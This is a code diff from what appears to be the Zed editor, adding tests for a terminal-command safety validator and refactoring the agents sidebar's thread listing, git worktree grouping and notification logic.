+ fn test_validate_terminal_command_safe_case_clause_without_substitutions() {
+ assert_eq!(
+ validate_terminal_command("case x in foo) echo hello;; esac"),
+ TerminalCommandValidation::Safe
+ );
+ }
+
+ #[test]
+ fn test_validate_terminal_command_rejects_substitution_in_arithmetic_for_clause() {
+ assert_ne!(
+ validate_terminal_command("for ((i=$(echo 0); i<3; i++)); do echo hello; done"),
+ TerminalCommandValidation::Safe
+ );
+ }
+
+ #[test]
+ fn test_validate_terminal_command_rejects_arithmetic_for_clause_unconditionally() {
+ assert_eq!(
+ validate_terminal_command("for ((i=0; i<3; i++)); do echo hello; done"),
+ TerminalCommandValidation::Unsafe
+ );
+ }
}
@@ -16,13 +16,16 @@ default = []
[dependencies]
acp_thread.workspace = true
+action_log.workspace = true
agent.workspace = true
agent-client-protocol.workspace = true
agent_ui.workspace = true
+anyhow.workspace = true
chrono.workspace = true
editor.workspace = true
feature_flags.workspace = true
fs.workspace = true
+git.workspace = true
gpui.workspace = true
menu.workspace = true
project.workspace = true
@@ -31,6 +34,7 @@ settings.workspace = true
theme.workspace = true
ui.workspace = true
util.workspace = true
+vim_mode_setting.workspace = true
workspace.workspace = true
zed_actions.workspace = true
@@ -41,10 +45,14 @@ agent_ui = { workspace = true, features = ["test-support"] }
assistant_text_thread = { workspace = true, features = ["test-support"] }
editor.workspace = true
language_model = { workspace = true, features = ["test-support"] }
+pretty_assertions.workspace = true
+prompt_store.workspace = true
+recent_projects = { workspace = true, features = ["test-support"] }
serde_json.workspace = true
feature_flags.workspace = true
fs = { workspace = true, features = ["test-support"] }
+git.workspace = true
gpui = { workspace = true, features = ["test-support"] }
project = { workspace = true, features = ["test-support"] }
settings = { workspace = true, features = ["test-support"] }
-workspace = { workspace = true, features = ["test-support"] }
+workspace = { workspace = true, features = ["test-support"] }
@@ -1,51 +1,72 @@
use acp_thread::ThreadStatus;
-use agent::ThreadStore;
-use agent_client_protocol as acp;
-use agent_ui::{AgentPanel, AgentPanelEvent, NewThread};
+use action_log::DiffStats;
+use agent_client_protocol::{self as acp};
+use agent_ui::thread_metadata_store::{SidebarThreadMetadataStore, ThreadMetadata};
+use agent_ui::threads_archive_view::{
+ ThreadsArchiveView, ThreadsArchiveViewEvent, format_history_entry_timestamp,
+};
+use agent_ui::{
+ Agent, AgentPanel, AgentPanelEvent, DEFAULT_THREAD_TITLE, NewThread, RemoveSelectedThread,
+};
use chrono::Utc;
-use editor::{Editor, EditorElement, EditorStyle};
+use editor::Editor;
use feature_flags::{AgentV2FeatureFlag, FeatureFlagViewExt as _};
use gpui::{
- AnyElement, App, Context, Entity, EventEmitter, FocusHandle, Focusable, FontStyle, ListState,
- Pixels, Render, SharedString, TextStyle, WeakEntity, Window, actions, list, prelude::*, px,
- relative, rems,
+ Action as _, AnyElement, App, Context, Entity, FocusHandle, Focusable, ListState, Pixels,
+ Render, SharedString, WeakEntity, Window, WindowHandle, list, prelude::*, px,
};
-use menu::{Cancel, Confirm, SelectFirst, SelectLast, SelectNext, SelectPrevious};
-use project::Event as ProjectEvent;
-use recent_projects::RecentProjects;
-use settings::Settings;
+use menu::{
+ Cancel, Confirm, SelectChild, SelectFirst, SelectLast, SelectNext, SelectParent, SelectPrevious,
+};
+use project::{AgentId, Event as ProjectEvent, linked_worktree_short_name};
+use recent_projects::sidebar_recent_projects::SidebarRecentProjects;
+use ui::utils::platform_title_bar_height;
+
+use settings::Settings as _;
use std::collections::{HashMap, HashSet};
use std::mem;
-use theme::{ActiveTheme, ThemeSettings};
-use ui::utils::TRAFFIC_LIGHT_PADDING;
+use std::path::Path;
+use std::rc::Rc;
+use std::sync::Arc;
+use theme::ActiveTheme;
use ui::{
- AgentThreadStatus, ButtonStyle, GradientFade, HighlightedLabel, IconButtonShape, KeyBinding,
- ListItem, PopoverMenu, PopoverMenuHandle, Tab, ThreadItem, TintColor, Tooltip, WithScrollbar,
- prelude::*,
+ AgentThreadStatus, CommonAnimationExt, ContextMenu, Divider, HighlightedLabel, KeyBinding,
+ PopoverMenu, PopoverMenuHandle, Tab, ThreadItem, TintColor, Tooltip, WithScrollbar, prelude::*,
};
+use util::ResultExt as _;
use util::path_list::PathList;
use workspace::{
- FocusWorkspaceSidebar, MultiWorkspace, MultiWorkspaceEvent, Sidebar as WorkspaceSidebar,
- SidebarEvent, ToggleWorkspaceSidebar, Workspace,
+ AddFolderToProject, FocusWorkspaceSidebar, MultiWorkspace, MultiWorkspaceEvent, Open,
+ Sidebar as WorkspaceSidebar, ToggleWorkspaceSidebar, Workspace, WorkspaceId,
};
+
use zed_actions::OpenRecent;
use zed_actions::editor::{MoveDown, MoveUp};
-actions!(
+use zed_actions::agents_sidebar::FocusSidebarFilter;
+
+gpui::actions!(
agents_sidebar,
[
- /// Collapses the selected entry in the workspace sidebar.
- CollapseSelectedEntry,
- /// Expands the selected entry in the workspace sidebar.
- ExpandSelectedEntry,
+ /// Creates a new thread in the currently selected or active project group.
+ NewThreadInGroup,
+ /// Toggles between the thread list and the archive view.
+ ToggleArchive,
]
);
-const DEFAULT_WIDTH: Pixels = px(320.0);
+const DEFAULT_WIDTH: Pixels = px(300.0);
const MIN_WIDTH: Pixels = px(200.0);
const MAX_WIDTH: Pixels = px(800.0);
const DEFAULT_THREADS_SHOWN: usize = 5;
+#[derive(Debug, Default)]
+enum SidebarView {
+ #[default]
+ ThreadList,
+ Archive(Entity<ThreadsArchiveView>),
+}
+
#[derive(Clone, Debug)]
struct ActiveThreadInfo {
session_id: acp::SessionId,
@@ -54,30 +75,45 @@ struct ActiveThreadInfo {
icon: IconName,
icon_from_external_svg: Option<SharedString>,
is_background: bool,
+ is_title_generating: bool,
+ diff_stats: DiffStats,
}
impl From<&ActiveThreadInfo> for acp_thread::AgentSessionInfo {
fn from(info: &ActiveThreadInfo) -> Self {
Self {
session_id: info.session_id.clone(),
- cwd: None,
+ work_dirs: None,
title: Some(info.title.clone()),
updated_at: Some(Utc::now()),
+ created_at: Some(Utc::now()),
meta: None,
}
}
}
+#[derive(Clone)]
+enum ThreadEntryWorkspace {
+ Open(Entity<Workspace>),
+ Closed(PathList),
+}
+
#[derive(Clone)]
struct ThreadEntry {
+ agent: Agent,
session_info: acp_thread::AgentSessionInfo,
icon: IconName,
icon_from_external_svg: Option<SharedString>,
status: AgentThreadStatus,
- workspace: Entity<Workspace>,
+ workspace: ThreadEntryWorkspace,
is_live: bool,
is_background: bool,
+ is_title_generating: bool,
highlight_positions: Vec<usize>,
+ worktree_name: Option<SharedString>,
+ worktree_full_path: Option<SharedString>,
+ worktree_highlight_positions: Vec<usize>,
+ diff_stats: DiffStats,
}
#[derive(Clone)]
@@ -87,17 +123,19 @@ enum ListEntry {
label: SharedString,
workspace: Entity<Workspace>,
highlight_positions: Vec<usize>,
- has_threads: bool,
+ has_running_threads: bool,
+ waiting_thread_count: usize,
+ is_active: bool,
},
Thread(ThreadEntry),
ViewMore {
path_list: PathList,
- remaining_count: usize,
is_fully_expanded: bool,
},
NewThread {
path_list: PathList,
workspace: Entity<Workspace>,
+ is_active_draft: bool,
},
}
@@ -111,6 +149,8 @@ impl From<ThreadEntry> for ListEntry {
struct SidebarContents {
entries: Vec<ListEntry>,
notified_threads: HashSet<acp::SessionId>,
+ project_header_indices: Vec<usize>,
+ has_open_projects: bool,
}
impl SidebarContents {
@@ -141,36 +181,55 @@ fn fuzzy_match_positions(query: &str, candidate: &str) -> Option<Vec<usize>> {
}
}
-fn workspace_path_list_and_label(
+// TODO: The mapping from workspace root paths to git repositories needs a
+// unified approach across the codebase: this function, `AgentPanel::classify_worktrees`,
+// thread persistence (which PathList is saved to the database), and thread
+// querying (which PathList is used to read threads back). All of these need
+// to agree on how repos are resolved for a given workspace, especially in
+// multi-root and nested-repo configurations.
+fn root_repository_snapshots(
workspace: &Entity<Workspace>,
cx: &App,
-) -> (PathList, SharedString) {
- let workspace_ref = workspace.read(cx);
- let mut paths = Vec::new();
- let mut names = Vec::new();
-
- for worktree in workspace_ref.worktrees(cx) {
- let worktree_ref = worktree.read(cx);
- if !worktree_ref.is_visible() {
- continue;
- }
- let abs_path = worktree_ref.abs_path();
- paths.push(abs_path.to_path_buf());
+) -> Vec<project::git_store::RepositorySnapshot> {
+ let path_list = workspace_path_list(workspace, cx);
+ let project = workspace.read(cx).project().read(cx);
+ project
+ .repositories(cx)
+ .values()
+ .filter_map(|repo| {
+ let snapshot = repo.read(cx).snapshot();
+ let is_root = path_list
+ .paths()
+ .iter()
+ .any(|p| p.as_path() == snapshot.work_directory_abs_path.as_ref());
+ is_root.then_some(snapshot)
+ })
+ .collect()
+}
+
+fn workspace_path_list(workspace: &Entity<Workspace>, cx: &App) -> PathList {
+ PathList::new(&workspace.read(cx).root_paths(cx))
+}
+
+fn workspace_label_from_path_list(path_list: &PathList) -> SharedString {
+ let mut names = Vec::with_capacity(path_list.paths().len());
+ for abs_path in path_list.paths() {
if let Some(name) = abs_path.file_name() {
names.push(name.to_string_lossy().to_string());
}
}
-
- let label: SharedString = if names.is_empty() {
+ if names.is_empty() {
// TODO: Can we do something better in this case?
"Empty Workspace".into()
} else {
names.join(", ").into()
- };
-
- (PathList::new(&paths), label)
+ }
}
+/// The sidebar re-derives its entire entry list from scratch on every
+/// change via `update_entries` → `rebuild_contents`. Avoid adding
+/// incremental or inter-event coordination state — if something can
+/// be computed from the current world state, compute it in the rebuild.
pub struct Sidebar {
multi_workspace: WeakEntity<MultiWorkspace>,
width: Pixels,
@@ -182,15 +241,23 @@ pub struct Sidebar {
///
/// Note: This is NOT the same as the active item.
selection: Option<usize>,
+ /// Derived from the active panel's thread in `rebuild_contents`.
+ /// Only updated when the panel returns `Some` — never cleared by
+ /// derivation, since the panel may transiently return `None` while
+ /// loading. User actions may write directly for immediate feedback.
focused_thread: Option<acp::SessionId>,
- active_entry_index: Option<usize>,
+ agent_panel_visible: bool,
+ active_thread_is_draft: bool,
+ hovered_thread_index: Option<usize>,
collapsed_groups: HashSet<PathList>,
expanded_groups: HashMap<PathList, usize>,
- recent_projects_popover_handle: PopoverMenuHandle<RecentProjects>,
+ view: SidebarView,
+ recent_projects_popover_handle: PopoverMenuHandle<SidebarRecentProjects>,
+ project_header_menu_ix: Option<usize>,
+ _subscriptions: Vec<gpui::Subscription>,
+ _draft_observation: Option<gpui::Subscription>,
}
-impl EventEmitter<SidebarEvent> for Sidebar {}
-
impl Sidebar {
pub fn new(
multi_workspace: Entity<MultiWorkspace>,
@@ -203,6 +270,7 @@ impl Sidebar {
let filter_editor = cx.new(|cx| {
let mut editor = Editor::single_line(window, cx);
+ editor.set_use_modal_editing(true);
editor.set_placeholder_text("Search…", window, cx);
editor
});
@@ -212,7 +280,7 @@ impl Sidebar {
window,
|this, _multi_workspace, event: &MultiWorkspaceEvent, window, cx| match event {
MultiWorkspaceEvent::ActiveWorkspaceChanged => {
- this.focused_thread = None;
+ this.observe_draft_editor(cx);
this.update_entries(cx);
}
MultiWorkspaceEvent::WorkspaceAdded(workspace) => {
@@ -234,27 +302,18 @@ impl Sidebar {
}
this.update_entries(cx);
if !query.is_empty() {
- this.selection = this
- .contents
- .entries
- .iter()
- .position(|entry| matches!(entry, ListEntry::Thread(_)))
- .or_else(|| {
- if this.contents.entries.is_empty() {
- None
- } else {
- Some(0)
- }
- });
+ this.select_first_entry();
}
}
})
.detach();
- let thread_store = ThreadStore::global(cx);
- cx.observe_in(&thread_store, window, |this, _, _window, cx| {
- this.update_entries(cx);
- })
+ cx.observe(
+ &SidebarThreadMetadataStore::global(cx),
+ |this, _store, cx| {
+ this.update_entries(cx);
+ },
+ )
.detach();
cx.observe_flag::<AgentV2FeatureFlag, _>(window, |_is_enabled, this, _window, cx| {
@@ -279,15 +338,27 @@ impl Sidebar {
contents: SidebarContents::default(),
selection: None,
focused_thread: None,
- active_entry_index: None,
+ agent_panel_visible: false,
+ active_thread_is_draft: false,
+ hovered_thread_index: None,
collapsed_groups: HashSet::new(),
expanded_groups: HashMap::new(),
+ view: SidebarView::default(),
recent_projects_popover_handle: PopoverMenuHandle::default(),
+ project_header_menu_ix: None,
+ _subscriptions: Vec::new(),
+ _draft_observation: None,
}
}
+ fn is_active_workspace(&self, workspace: &Entity<Workspace>, cx: &App) -> bool {
+ self.multi_workspace
+ .upgrade()
+ .map_or(false, |mw| mw.read(cx).workspace() == workspace)
+ }
+
fn subscribe_to_workspace(
- &self,
+ &mut self,
workspace: &Entity<Workspace>,
window: &mut Window,
cx: &mut Context<Self>,
@@ -307,6 +378,26 @@ impl Sidebar {
)
.detach();
+ let git_store = workspace.read(cx).project().read(cx).git_store().clone();
+ cx.subscribe_in(
+ &git_store,
+ window,
+ |this, _, event: &project::git_store::GitStoreEvent, window, cx| {
+ if matches!(
+ event,
+ project::git_store::GitStoreEvent::RepositoryUpdated(
+ _,
+ project::git_store::RepositoryEvent::GitWorktreeListChanged,
+ _,
+ )
+ ) {
+ this.prune_stale_worktree_workspaces(window, cx);
+ this.update_entries(cx);
+ }
+ },
+ )
+ .detach();
+
cx.subscribe_in(
workspace,
window,
@@ -320,13 +411,19 @@ impl Sidebar {
)
.detach();
+ self.observe_docks(workspace, cx);
+
if let Some(agent_panel) = workspace.read(cx).panel::<AgentPanel>(cx) {
self.subscribe_to_agent_panel(&agent_panel, window, cx);
+ if self.is_active_workspace(workspace, cx) {
+ self.agent_panel_visible = AgentPanel::is_visible(workspace, cx);
+ }
+ self.observe_draft_editor(cx);
}
}
fn subscribe_to_agent_panel(
- &self,
+ &mut self,
agent_panel: &Entity<AgentPanel>,
window: &mut Window,
cx: &mut Context<Self>,
@@ -336,29 +433,17 @@ impl Sidebar {
window,
|this, agent_panel, event: &AgentPanelEvent, _window, cx| match event {
AgentPanelEvent::ActiveViewChanged => {
- match agent_panel.read(cx).active_connection_view() {
- Some(thread) => {
- if let Some(session_id) = thread.read(cx).parent_id(cx) {
- this.focused_thread = Some(session_id);
- }
- }
- None => {
- this.focused_thread = None;
- }
- }
- this.update_entries(cx);
- }
- AgentPanelEvent::ThreadFocused => {
- let new_focused = agent_panel
+ let is_new_draft = agent_panel
.read(cx)
- .active_connection_view()
- .and_then(|thread| thread.read(cx).parent_id(cx));
- if new_focused.is_some() && new_focused != this.focused_thread {
- this.focused_thread = new_focused;
- this.update_entries(cx);
+ .active_conversation_view()
+ .is_some_and(|cv| cv.read(cx).parent_id(cx).is_none());
+ if is_new_draft {
+ this.focused_thread = None;
}
+ this.observe_draft_editor(cx);
+ this.update_entries(cx);
}
- AgentPanelEvent::BackgroundThreadChanged => {
+ AgentPanelEvent::ThreadFocused | AgentPanelEvent::BackgroundThreadChanged => {
this.update_entries(cx);
}
},
@@ -366,6 +451,99 @@ impl Sidebar {
.detach();
}
+ fn observe_docks(&mut self, workspace: &Entity<Workspace>, cx: &mut Context<Self>) {
+ let docks: Vec<_> = workspace
+ .read(cx)
+ .all_docks()
+ .into_iter()
+ .cloned()
+ .collect();
+ let workspace = workspace.downgrade();
+ for dock in docks {
+ let workspace = workspace.clone();
+ cx.observe(&dock, move |this, _dock, cx| {
+ let Some(workspace) = workspace.upgrade() else {
+ return;
+ };
+ if !this.is_active_workspace(&workspace, cx) {
+ return;
+ }
+
+ let is_visible = AgentPanel::is_visible(&workspace, cx);
+
+ if this.agent_panel_visible != is_visible {
+ this.agent_panel_visible = is_visible;
+ cx.notify();
+ }
+ })
+ .detach();
+ }
+ }
+
+ fn observe_draft_editor(&mut self, cx: &mut Context<Self>) {
+ self._draft_observation = self
+ .multi_workspace
+ .upgrade()
+ .and_then(|mw| {
+ let ws = mw.read(cx).workspace();
+ ws.read(cx).panel::<AgentPanel>(cx)
+ })
+ .and_then(|panel| {
+ let cv = panel.read(cx).active_conversation_view()?;
+ let tv = cv.read(cx).active_thread()?;
+ Some(tv.read(cx).message_editor.clone())
+ })
+ .map(|editor| {
+ cx.observe(&editor, |_this, _editor, cx| {
+ cx.notify();
+ })
+ });
+ }
+
+ fn active_draft_text(&self, cx: &App) -> Option<SharedString> {
+ let mw = self.multi_workspace.upgrade()?;
+ let workspace = mw.read(cx).workspace();
+ let panel = workspace.read(cx).panel::<AgentPanel>(cx)?;
+ let conversation_view = panel.read(cx).active_conversation_view()?;
+ let thread_view = conversation_view.read(cx).active_thread()?;
+ let raw = thread_view.read(cx).message_editor.read(cx).text(cx);
+ let cleaned = Self::clean_mention_links(&raw);
+ let mut text: String = cleaned.split_whitespace().collect::<Vec<_>>().join(" ");
+ if text.is_empty() {
+ None
+ } else {
+ const MAX_CHARS: usize = 250;
+ if let Some((truncate_at, _)) = text.char_indices().nth(MAX_CHARS) {
+ text.truncate(truncate_at);
+ }
+ Some(text.into())
+ }
+ }
+
+ fn clean_mention_links(input: &str) -> String {
+ let mut result = String::with_capacity(input.len());
+ let mut remaining = input;
+
+ while let Some(start) = remaining.find("[@") {
+ result.push_str(&remaining[..start]);
+ let after_bracket = &remaining[start + 1..]; // skip '['
+ if let Some(close_bracket) = after_bracket.find("](") {
+ let mention = &after_bracket[..close_bracket]; // "@something"
+ let after_link_start = &after_bracket[close_bracket + 2..]; // after "]("
+ if let Some(close_paren) = after_link_start.find(')') {
+ result.push_str(mention);
+ remaining = &after_link_start[close_paren + 1..];
+ continue;
+ }
+ }
+ // Couldn't parse full link syntax — emit the literal "[@" and move on.
+ result.push_str("[@");
+ remaining = &remaining[start + 2..];
+ }
+ result.push_str(remaining);
+ result
+ }
+
fn all_thread_infos_for_workspace(
workspace: &Entity<Workspace>,
cx: &App,
@@ -384,7 +562,11 @@ impl Sidebar {
let icon = thread_view_ref.agent_icon;
let icon_from_external_svg = thread_view_ref.agent_icon_from_external_svg.clone();
- let title = thread.title();
+ let title = thread
+ .title()
+ .unwrap_or_else(|| DEFAULT_THREAD_TITLE.into());
+ let is_native = thread_view_ref.as_native_thread(cx).is_some();
+ let is_title_generating = is_native && thread.has_provisional_title();
let session_id = thread.session_id().clone();
let is_background = agent_panel_ref.is_background_thread(&session_id);
@@ -399,6 +581,8 @@ impl Sidebar {
}
};
+ let diff_stats = thread.action_log().read(cx).diff_stats(cx);
+
ActiveThreadInfo {
session_id,
title,
@@ -406,11 +590,15 @@ impl Sidebar {
icon,
icon_from_external_svg,
is_background,
+ is_title_generating,
+ diff_stats,
}
})
.collect()
}
+ /// When modifying this thread, aim for a single forward pass over workspaces
+ /// and threads plus an O(T log T) sort. Avoid adding extra scans over the data.
fn rebuild_contents(&mut self, cx: &App) {
let Some(multi_workspace) = self.multi_workspace.upgrade() else {
return;
@@ -419,9 +607,43 @@ impl Sidebar {
let workspaces = mw.workspaces().to_vec();
let active_workspace = mw.workspaces().get(mw.active_workspace_index()).cloned();
- let thread_store = ThreadStore::try_global(cx);
+ // Build a lookup for agent icons from the first workspace's AgentServerStore.
+ let agent_server_store = workspaces
+ .first()
+ .map(|ws| ws.read(cx).project().read(cx).agent_server_store().clone());
+
let query = self.filter_editor.read(cx).text(cx);
+ // Re-derive agent_panel_visible from the active workspace so it stays
+ // correct after workspace switches.
+ self.agent_panel_visible = active_workspace
+ .as_ref()
+ .map_or(false, |ws| AgentPanel::is_visible(ws, cx));
+
+ // Derive active_thread_is_draft BEFORE focused_thread so we can
+ // use it as a guard below.
+ self.active_thread_is_draft = active_workspace
+ .as_ref()
+ .and_then(|ws| ws.read(cx).panel::<AgentPanel>(cx))
+ .map_or(false, |panel| panel.read(cx).active_thread_is_draft(cx));
+
+ // Derive focused_thread from the active workspace's agent panel.
+ // Only update when the panel gives us a positive signal — if the
+ // panel returns None (e.g. still loading after a thread activation),
+ // keep the previous value so eager writes from user actions survive.
+ let panel_focused = active_workspace
+ .as_ref()
+ .and_then(|ws| ws.read(cx).panel::<AgentPanel>(cx))
+ .and_then(|panel| {
+ panel
+ .read(cx)
+ .active_conversation_view()
+ .and_then(|cv| cv.read(cx).parent_id(cx))
+ });
+ if panel_focused.is_some() && !self.active_thread_is_draft {
+ self.focused_thread = panel_focused;
+ }
+
let previous = mem::take(&mut self.contents);
let old_statuses: HashMap<acp::SessionId, AgentThreadStatus> = previous
@@ -437,87 +659,294 @@ impl Sidebar {
let mut entries = Vec::new();
let mut notified_threads = previous.notified_threads;
- // Track all session IDs we add to entries so we can prune stale
- // notifications without a separate pass at the end.
let mut current_session_ids: HashSet<acp::SessionId> = HashSet::new();
- // Compute active_entry_index inline during the build pass.
- let mut active_entry_index: Option<usize> = None;
+ let mut project_header_indices: Vec<usize> = Vec::new();
+
+ // Identify absorbed workspaces in a single pass. A workspace is
+ // "absorbed" when it points at a git worktree checkout whose main
+ // repo is open as another workspace — its threads appear under the
+ // main repo's header instead of getting their own.
+ let mut main_repo_workspace: HashMap<Arc<Path>, usize> = HashMap::new();
+ let mut absorbed: HashMap<usize, (usize, SharedString)> = HashMap::new();
+ let mut pending: HashMap<Arc<Path>, Vec<(usize, SharedString, Arc<Path>)>> = HashMap::new();
+ let mut absorbed_workspace_by_path: HashMap<Arc<Path>, usize> = HashMap::new();
+
+ for (i, workspace) in workspaces.iter().enumerate() {
+ for snapshot in root_repository_snapshots(workspace, cx) {
+ if snapshot.work_directory_abs_path == snapshot.original_repo_abs_path {
+ main_repo_workspace
+ .entry(snapshot.work_directory_abs_path.clone())
+ .or_insert(i);
+ if let Some(waiting) = pending.remove(&snapshot.work_directory_abs_path) {
+ for (ws_idx, name, ws_path) in waiting {
+ absorbed.insert(ws_idx, (i, name));
+ absorbed_workspace_by_path.insert(ws_path, ws_idx);
+ }
+ }
+ } else {
+ let name: SharedString = snapshot
+ .work_directory_abs_path
+ .file_name()
+ .unwrap_or_default()
+ .to_string_lossy()
+ .to_string()
+ .into();
+ if let Some(&main_idx) =
+ main_repo_workspace.get(&snapshot.original_repo_abs_path)
+ {
+ absorbed.insert(i, (main_idx, name));
+ absorbed_workspace_by_path
+ .insert(snapshot.work_directory_abs_path.clone(), i);
+ } else {
+ pending
+ .entry(snapshot.original_repo_abs_path.clone())
+ .or_default()
+ .push((i, name, snapshot.work_directory_abs_path.clone()));
+ }
+ }
+ }
+ }
+
+ let has_open_projects = workspaces
+ .iter()
+ .any(|ws| !workspace_path_list(ws, cx).paths().is_empty());
+
+ let active_ws_index = active_workspace
+ .as_ref()
+ .and_then(|active| workspaces.iter().position(|ws| ws == active));
- for workspace in workspaces.iter() {
- let (path_list, label) = workspace_path_list_and_label(workspace, cx);
+ for (ws_index, workspace) in workspaces.iter().enumerate() {
+ if absorbed.contains_key(&ws_index) {
+ continue;
+ }
+
+ let path_list = workspace_path_list(workspace, cx);
+ if path_list.paths().is_empty() {
+ continue;
+ }
+
+ let label = workspace_label_from_path_list(&path_list);
let is_collapsed = self.collapsed_groups.contains(&path_list);
let should_load_threads = !is_collapsed || !query.is_empty();
+ let is_active = active_ws_index.is_some_and(|active_idx| {
+ active_idx == ws_index
+ || absorbed
+ .get(&active_idx)
+ .is_some_and(|(main_idx, _)| *main_idx == ws_index)
+ });
+
+ let mut live_infos = Self::all_thread_infos_for_workspace(workspace, cx);
+
let mut threads: Vec<ThreadEntry> = Vec::new();
+ let mut has_running_threads = false;
+ let mut waiting_thread_count: usize = 0;
if should_load_threads {
- if let Some(ref thread_store) = thread_store {
- for meta in thread_store.read(cx).threads_for_paths(&path_list) {
- threads.push(ThreadEntry {
- session_info: meta.into(),
- icon: IconName::ZedAgent,
- icon_from_external_svg: None,
- status: AgentThreadStatus::default(),
- workspace: workspace.clone(),
- is_live: false,
- is_background: false,
- highlight_positions: Vec::new(),
- });
- }
+ let mut seen_session_ids: HashSet<acp::SessionId> = HashSet::new();
+
+ // Read threads from the store cache for this workspace's path list.
+ let thread_store = SidebarThreadMetadataStore::global(cx);
+ let workspace_rows: Vec<_> =
+ thread_store.read(cx).entries_for_path(&path_list).collect();
+ for row in workspace_rows {
+ seen_session_ids.insert(row.session_id.clone());
+ let (agent, icon, icon_from_external_svg) = match &row.agent_id {
+ None => (Agent::NativeAgent, IconName::ZedAgent, None),
+ Some(id) => {
+ let custom_icon = agent_server_store
+ .as_ref()
+ .and_then(|store| store.read(cx).agent_icon(&id));
+ (
+ Agent::Custom { id: id.clone() },
+ IconName::Terminal,
+ custom_icon,
+ )
+ }
+ };
+ threads.push(ThreadEntry {
+ agent,
+ session_info: acp_thread::AgentSessionInfo {
+ session_id: row.session_id.clone(),
+ work_dirs: None,
+ title: Some(row.title.clone()),
+ updated_at: Some(row.updated_at),
+ created_at: row.created_at,
+ meta: None,
+ },
+ icon,
+ icon_from_external_svg,
+ status: AgentThreadStatus::default(),
+ workspace: ThreadEntryWorkspace::Open(workspace.clone()),
+ is_live: false,
+ is_background: false,
+ is_title_generating: false,
+ highlight_positions: Vec::new(),
+ worktree_name: None,
+ worktree_full_path: None,
+ worktree_highlight_positions: Vec::new(),
+ diff_stats: DiffStats::default(),
+ });
}
- let live_infos = Self::all_thread_infos_for_workspace(workspace, cx);
+ // Load threads from linked git worktrees of this workspace's repos.
+ {
+ let mut linked_worktree_queries: Vec<(PathList, SharedString, Arc<Path>)> =
+ Vec::new();
+ for snapshot in root_repository_snapshots(workspace, cx) {
+ if snapshot.work_directory_abs_path != snapshot.original_repo_abs_path {
+ continue;
+ }
+
+ let main_worktree_path = snapshot.original_repo_abs_path.clone();
+
+ for git_worktree in snapshot.linked_worktrees() {
+ let worktree_name =
+ linked_worktree_short_name(&main_worktree_path, &git_worktree.path)
+ .unwrap_or_default();
+ linked_worktree_queries.push((
+ PathList::new(std::slice::from_ref(&git_worktree.path)),
+ worktree_name,
+ Arc::from(git_worktree.path.as_path()),
+ ));
+ }
+ }
- if !live_infos.is_empty() {
- let thread_index_by_session: HashMap<acp::SessionId, usize> = threads
- .iter()
- .enumerate()
- .map(|(i, t)| (t.session_info.session_id.clone(), i))
- .collect();
+ for (worktree_path_list, worktree_name, worktree_path) in
+ &linked_worktree_queries
+ {
+ let target_workspace =
+ match absorbed_workspace_by_path.get(worktree_path.as_ref()) {
+ Some(&idx) => {
+ live_infos.extend(Self::all_thread_infos_for_workspace(
+ &workspaces[idx],
+ cx,
+ ));
+ ThreadEntryWorkspace::Open(workspaces[idx].clone())
+ }
+ None => ThreadEntryWorkspace::Closed(worktree_path_list.clone()),
+ };
- for info in &live_infos {
- let Some(&idx) = thread_index_by_session.get(&info.session_id) else {
- continue;
- };
+ let worktree_rows: Vec<_> = thread_store
+ .read(cx)
+ .entries_for_path(worktree_path_list)
+ .collect();
+ for row in worktree_rows {
+ if !seen_session_ids.insert(row.session_id.clone()) {
+ continue;
+ }
+ let (agent, icon, icon_from_external_svg) = match &row.agent_id {
+ None => (Agent::NativeAgent, IconName::ZedAgent, None),
+ Some(name) => {
+ let custom_icon =
+ agent_server_store.as_ref().and_then(|store| {
+ store.read(cx).agent_icon(&AgentId(name.clone().into()))
+ });
+ (
+ Agent::Custom {
+ id: AgentId::new(name.clone()),
+ },
+ IconName::Terminal,
+ custom_icon,
+ )
+ }
+ };
+ threads.push(ThreadEntry {
+ agent,
+ session_info: acp_thread::AgentSessionInfo {
+ session_id: row.session_id.clone(),
+ work_dirs: None,
+ title: Some(row.title.clone()),
+ updated_at: Some(row.updated_at),
+ created_at: row.created_at,
+ meta: None,
+ },
+ icon,
+ icon_from_external_svg,
+ status: AgentThreadStatus::default(),
+ workspace: target_workspace.clone(),
+ is_live: false,
+ is_background: false,
+ is_title_generating: false,
+ highlight_positions: Vec::new(),
+ worktree_name: Some(worktree_name.clone()),
+ worktree_full_path: Some(
+ worktree_path.display().to_string().into(),
+ ),
+ worktree_highlight_positions: Vec::new(),
+ diff_stats: DiffStats::default(),
+ });
+ }
+ }
+ }
+
+ // Build a lookup from live_infos and compute running/waiting
+ // counts in a single pass.
+ let mut live_info_by_session: HashMap<&acp::SessionId, &ActiveThreadInfo> =
+ HashMap::new();
+ for info in &live_infos {
+ live_info_by_session.insert(&info.session_id, info);
+ if info.status == AgentThreadStatus::Running {
+ has_running_threads = true;
+ }
+ if info.status == AgentThreadStatus::WaitingForConfirmation {
+ waiting_thread_count += 1;
+ }
+ }
- let thread = &mut threads[idx];
+ // Merge live info into threads and update notification state
+ // in a single pass.
+ for thread in &mut threads {
+ let session_id = &thread.session_info.session_id;
+
+ if let Some(info) = live_info_by_session.get(session_id) {
thread.session_info.title = Some(info.title.clone());
thread.status = info.status;
thread.icon = info.icon;
thread.icon_from_external_svg = info.icon_from_external_svg.clone();
thread.is_live = true;
thread.is_background = info.is_background;
+ thread.is_title_generating = info.is_title_generating;
+ thread.diff_stats = info.diff_stats;
}
- }
- // Update notification state for live threads in the same pass.
- let is_active_workspace = active_workspace
- .as_ref()
- .is_some_and(|active| active == workspace);
+ let is_thread_workspace_active = match &thread.workspace {
+ ThreadEntryWorkspace::Open(thread_workspace) => active_workspace
+ .as_ref()
+ .is_some_and(|active| active == thread_workspace),
+ ThreadEntryWorkspace::Closed(_) => false,
+ };
- for thread in &threads {
- let session_id = &thread.session_info.session_id;
- if thread.is_background && thread.status == AgentThreadStatus::Completed {
- notified_threads.insert(session_id.clone());
- } else if thread.status == AgentThreadStatus::Completed
- && !is_active_workspace
+ if thread.status == AgentThreadStatus::Completed
+ && !is_thread_workspace_active
&& old_statuses.get(session_id) == Some(&AgentThreadStatus::Running)
{
notified_threads.insert(session_id.clone());
}
- if is_active_workspace && !thread.is_background {
+ if is_thread_workspace_active && !thread.is_background {
notified_threads.remove(session_id);
}
}
- threads.sort_by(|a, b| b.session_info.updated_at.cmp(&a.session_info.updated_at));
+ threads.sort_by(|a, b| {
+ let a_time = a.session_info.created_at.or(a.session_info.updated_at);
+ let b_time = b.session_info.created_at.or(b.session_info.updated_at);
+ b_time.cmp(&a_time)
+ });
+ } else {
+ for info in &live_infos {
+ if info.status == AgentThreadStatus::Running {
+ has_running_threads = true;
